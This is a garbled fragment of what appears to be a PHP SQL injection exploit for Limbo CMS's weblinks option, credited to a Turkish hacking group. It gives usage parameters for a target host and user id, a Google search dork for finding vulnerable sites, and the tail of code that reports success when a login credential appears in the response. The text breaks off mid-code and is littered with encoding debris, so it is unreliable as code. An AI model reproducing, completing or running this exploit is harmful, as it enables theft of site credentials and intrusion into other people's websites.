|  | 
=0D
[i] Limbo CMS (option=weblinks) sql injection exploit=0D
[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}=0D
	=0D
[*] Usage: ?host=[hostname]&path=[limbo_path]&id=[user_id]=0D
[*] Exemple: ?host=127.0.0.1&path=/limbo&id=1=0D
=0D
[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	=0D
/",$f)) && (preg_match("/login/",$f)) )=0D
       {=0D
			echo "$f";=0D
			echo "[+] Enjoy! :>=0D
";=0D
			$success = 1;=0D
	   }=0D
   }=0D
   fclose($fp);=0D
   =0D
   if (!$success)=0D
	echo "
[-] exploit failed :<
";=0D
}=0D
?> =0D